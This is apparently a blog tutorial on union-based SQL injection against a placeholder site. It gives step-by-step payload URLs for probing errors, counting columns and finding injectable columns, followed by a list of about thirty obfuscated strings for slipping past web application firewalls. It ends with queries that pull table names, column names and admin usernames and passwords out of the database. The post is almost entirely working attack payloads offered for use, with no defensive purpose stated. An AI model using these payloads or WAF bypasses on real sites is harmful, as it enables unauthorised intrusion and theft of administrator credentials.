Lets Start Injecting.
Here Is Our Target .
http://www.targetsite.com/news.php?id=11
Add Single Quote (') at the End Of The URL .
http://www.targetsite.com/news.php?id=11'
Lets Balance Our Query for Further Injecting.
Some Comments from our Previous Tutorials.
http://www.targetsite.com/news.php?id=11--
http://www.targetsite.com/news.php?id=11--+
http://www.targetsite.com/news.php?id=11-- -
http://www.targetsite.com/news.php?id=11%23
http://www.targetsite.com/news.php?id=11;
Here Is A Small Explanation on Balance and Comment in our Injection.
After Balancing Our Query . Next is Count Total Number Of Columns
http://www.targetsite.com/news.php?id=11 order by 1--+
No Error !
http://www.targetsite.com/news.php?id=11 order by 3--+
No Error!
http://www.targetsite.com/news.php?id=11 order by 5--+
Again No Error !
http://www.targetsite.com/news.php?id=11 order by 6--+
Here We Get Error !
Unknown column '6' in 'order clause'
Now Try To Find Our Vulnerable Columns.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+
If Our Target site Is Protected with WAF . WAF Will Block Our Query and Give Us Mod_Security Error.
So Here some WAF Bypassing Methods.
- /*!%55NiOn*/ /*!%53eLEct*/
- %55nion(%53elect 1,2,3)-- -
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- /**/UNION/**//*!50000SELECT*//**/
- /*!50000UniON SeLeCt*/
- union /*!50000%53elect*/
- +#uNiOn+#sEleCt
- +#1q%0AuNiOn all#qa%0A#%0AsEleCt
- /*!%55NiOn*/ /*!%53eLEct*/
- /*!u%6eion*/ /*!se%6cect*/
- +un/**/ion+se/**/lect
- uni%0bon+se%0blect
- %2f**%2funion%2f**%2fselect
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- REVERSE(noinu)+REVERSE(tceles)
- /*--*/union/*--*/select/*--*/
- union (/*!/**/ SeleCT */ 1,2,3)
- /*!union*/+/*!select*/
- union+/*!select*/
- /**/union/**/select/**/
- /**/uNIon/**/sEleCt/**/
- /**//*!union*//**//*!select*//**/
- /*!uNIOn*/ /*!SelECt*/
- +union+distinct+select+
- +union+distinctROW+select+
Lets Continue Our Tutorial.
Now Check The Vulnerable Columns.we Use ( - ) for Finding Vulnerable columns.
We Can Also Check Vulnerable Columns with Other methods instead of Just Using (-).
Here Are Some Vulnerable Columns Checking Methods With Examples.
Using And 0
http://www.targetsite.com/news.php?id=11 and 0 Union Select 1,2,3,4,5--+
Using And False
http://www.targetsite.com/news.php?id=11 and false Union Select 1,2,3,4,5--+
Using Div 0
http://www.targetsite.com/news.php?id=11 Div 0 Union Select 1,2,3,4,5--+
Using null
http://www.targetsite.com/news.php?id=null Union Select 1,2,3,4,5--+
Using .1337
http://www.targetsite.com/news.php?id=11.1337 Union Select 1,2,3,4,5--+
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,3,4,5--+
We Will Get Our Vulnerable Columns Printed On The Page.3 is Our Vulnerable Column.
Here Are Some Variables Of MYSQL.
@@version = Current Version
@@GLOBAL.VERSION = Current Version
User() = Current User
Database = Current Database
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,@@version,4,5--+
We Can See Current Version Printed on the Page.
Next Step Is To Get The Tables.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--+
We can See Total Tables in Our Primary Database.
Now if you Want To Get Admin Details Of The Target Site check the Table name of Admin.
then encode admin table name in MYSQL Char() to get The Columns in the Admin Table.Change table_name to column_name,information_schema.tables to information_schema.columns and Table_schema to Table_name.And Replace Database() with our MYSQL Char() admin value.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--+
we can see the Column Names on Page . like id,username,pass
to Get The Data From columns here is our final Query.
http://www.targetsite.com/news.php?id=-11 Union Select 1,2,concat(username,0x3a,password),4,5 from admin--+
No comments:
Post a Comment